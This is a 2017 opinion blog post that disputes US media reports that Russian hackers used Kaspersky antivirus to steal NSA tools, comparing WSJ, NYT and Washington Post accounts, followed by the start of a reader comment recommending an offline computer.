"... An NSA slide describing "Project CAMBERDADA" lists at least 23 antivirus and security firms that were in that spy agency's sights . They include the Finnish antivirus firm F-Secure, the Slovakian firm Eset, Avast software from the Czech Republic. and Bit-Defender from Romania. Notably missing from the list are the American anti-virus firms Symantec and McAfee as well as the UK-based firm Sophos ..."
"... That the NSA and the British GCHQ did not list U.S. and British made anti-virus products on their "to do" list lets one assume that these packages can already be controlled by them. ..."
"... The Kaspersky anti-virus software, which the NSA employee had installed, identified parts of these tools as malware and uploaded them for analysis to the Kapersky's central detection database. The Kaspersky software behaved exactly as it should . Any other anti-virus software behaves similar if it detects a possibly new virus. ..."
"... The only person in the tale who did something illegal was the NSA employee. The case also demonstrates that the NSA continues to have a massive insider security problem. There is no hint in the story to any evidence for its core claim of "Russian hackers". ..."
"... Meanwhile its a well reported established fact that american virus/antimalware corps have allowed the FBI and other agencies to compromize their software with silent signatures - as with Magic Lantern for example (and imagine how far its gone since then) ..."
"... In the network security world there is this concept of a honeypot where you entice/allow the world to attack/invade your honeypot so you can study the tools they use and insure the trail back to them is useful. ..."
Oct 11, 2017 | www.moonofalabama.org
... ... ...

U.S. and British spies systematically target all anti-virus products and companies :

The British spy agency regarded the Kaspersky software in particular as a hindrance to its hacking operations and sought a way to neutralize it.
...
An NSA slide describing "Project CAMBERDADA" lists at least 23 antivirus and security firms that were in that spy agency's sights . They include the Finnish antivirus firm F-Secure, the Slovakian firm Eset, Avast software from the Czech Republic. and Bit-Defender from Romania. Notably missing from the list are the American anti-virus firms Symantec and McAfee as well as the UK-based firm Sophos

That the NSA and the British GCHQ did not list U.S. and British made anti-virus products on their "to do" list lets one assume that these packages can already be controlled by them.

In February 2015 Kaspersky announced that it found U.S. and UK government spying and sabotage software infecting computers in various foreign countries. Later that year the CIA and FBI tried to recruit Kaspersky employees but were warned off. In June 2015 Kaspersky Lab detected a breach in its own systems by an Israeli government malware. It published an extensive autopsy of the breach and the malware programs used in it.

That the U.S. government now attempts to damage Kaspersky is likely a sign that Kaspersky products continue to be a hard-target that the NSA and GCHQ find difficult to breach.

To justify the campaign against Kaspersky, which began in May, U.S. officials recently started to provide a series of cover stories. A diligent reading of these stories reveals inconsistencies and a lack of logic. On October 5 the Wall Street Journal reported: Russian Hackers Stole NSA Data on U.S. Cyber Defense :

Hackers working for the Russian government stole details of how the U.S. penetrates foreign computer networks and defends against cyberattacks after a National Security Agency contractor removed the highly classified material and put it on his home computer, according to multiple people with knowledge of the matter.

The hackers appear to have targeted the contractor after identifying the files through the contractor's use of a popular antivirus software made by Russia-based Kaspersky Lab, these people said.

A NSA employee copied code of top-secret NSA spy tools and put it on his private computer. ("It's just that he was trying to complete the mission, and he needed the tools to do it." said 'one person familiar with the case' to WaPo.)

The Kaspersky anti-virus software, which the NSA employee had installed, identified parts of these tools as malware and uploaded them for analysis to the Kapersky's central detection database. The Kaspersky software behaved exactly as it should . Any other anti-virus software behaves similar if it detects a possibly new virus.

The "multiple people with knowledge of the matter" talking to the WSJ seem to allege that this was a "Russian hacker" breach of NSA code. But nothing was hacked. If the story is correct, the Kaspersky tool was legally installed and worked as it should. The only person in the tale who did something illegal was the NSA employee. The case also demonstrates that the NSA continues to have a massive insider security problem. There is no hint in the story to any evidence for its core claim of "Russian hackers".

... ... ...

Further down the WSJ story says :
The incident occurred in 2015 but wasn't discovered until spring of last year , said the people familiar with the matter."

The stolen material included details about how the NSA penetrates foreign computer networks, the computer code it uses for such spying and how it defends networks inside the U.S., these people said.

If the last sentence is true the employee must have had top access to multiple NSA programs.

A new story in the New York Times today builds on the WSJ tale above. It makes the claims therein even more suspicious. The headline - How Israel Caught Russian Hackers Scouring the World for U.S. Secrets :

It was a case of spies watching spies watching spies: Israeli intelligence officers looked on in real time as Russian government hackers searched computers around the world for the code names of American intelligence programs.

What gave the Russian hacking, detected more than two years ago , such global reach was its improvised search tool -- antivirus software made by a Russian company, Kaspersky Lab, ...

The Israeli officials who had hacked into Kaspersky's own network alerted the United States to the broad Russian intrusion, which has not been previously reported, leading to a decision just last month to order Kaspersky software removed from government computers.

The Russian operation, described by multiple people who have been briefed on the matter, is known to have stolen classified documents from a National Security Agency employee who had improperly stored them on his home computer.

The Washington Post version of the story is remarkable different. Unlike the NYT it does not claim any Russian government involvement in Kaspersky systems:

In 2015, Israeli government hackers saw something suspicious in the computers of a Moscow-based cybersecurity firm : hacking tools that could only have come from the National Security Agency.

Israel notified the NSA, where alarmed officials immediately began a hunt for the breach, according to people familiar with the matter, who said an investigation by the agency revealed that the tools were in the possession of the Russian government

Israeli spies had found the hacking material on the network of Kaspersky Lab ...

While the NYT asserts that the Russian government had access to the Kaspersky systems, the Washington Post does not assert that at all.

The NYT claims that the Israelis alerted the NSA of Russian government knowledge of its tools while WaPo says that it was the NSA itself that found this out. That Israel alerts the NSA when it has its hands on a valuable source that reveals NSA tools is not believable. There is no love lost between Israeli and U.S. spy agencies. They spy on each other whenever they can with even deadly consequences .

The NYT story is based on "current and former government officials", not on the usual " U.S. officials". It might well be that Israeli spies are spinning the NYT tale.

We already knew that the Israeli government had in 2015 breached some Kaspersky systems. Kaspersky Lab itself alarmed the public about it and provided an extensive forensic report.

There are several important questions that the above quote stories do not ask:

If the Israelis detected NSA malware in the hand of the Russian government "more than two years ago" (NYT) how come that the NSA hole was only found in 2016 (WSJ)? Did the Israelis use their claimed knowledge for a year without alarming their "allies" at the NSA? Why?

And why would the detection of alleged Russian government intrusion into Kaspersky products lead to a ban of these products only in fall 2017?

If the story were true the NSA should have reacted immediately. All Kaspersky products should have been banned from U.S. government systems as soon as the problem was known. The NSA allowed the Russian government, for more than a year, to sniff through all systems of the more than two dozen American government agencies (including the military) which use the Kaspersky products? That does not make sense.

These recently provided stories stink. There is no evidence provided for the assertions therein. They make the false claim that the NSA employees computer was "hacked". Their timelines make no sense. If not complete fantasies they are likely to be heavily spun to achieve a specific goal: to justify the banning of Kaspersky products from U.S. markets.

I regard these stories as part of "blame Russia" campaign that is used by the military-industrial complex to justify new defense spending. They may also be useful in removing a good security product that the NSA failed to breach from the "western" markets.

Oilman2 | Oct 11, 2017 10:29:02 AM | 10

Computers are dirt cheap these days. My first Mac cost me $3000 and the first clone PC I built cost me $1500. Today, I can buy a super-duper-anti-pooper PC device for $500. Hell folks, that is cheaper than an Iphone...

Use one computer for your critical work that has no internet connection, or use an old PC that has no network card. The OS may be uncool by today's standards, but the dang business software has hardly changed - just gotten more bloated with features.

Have one computer for exposure to wild viruses and all that crap, and another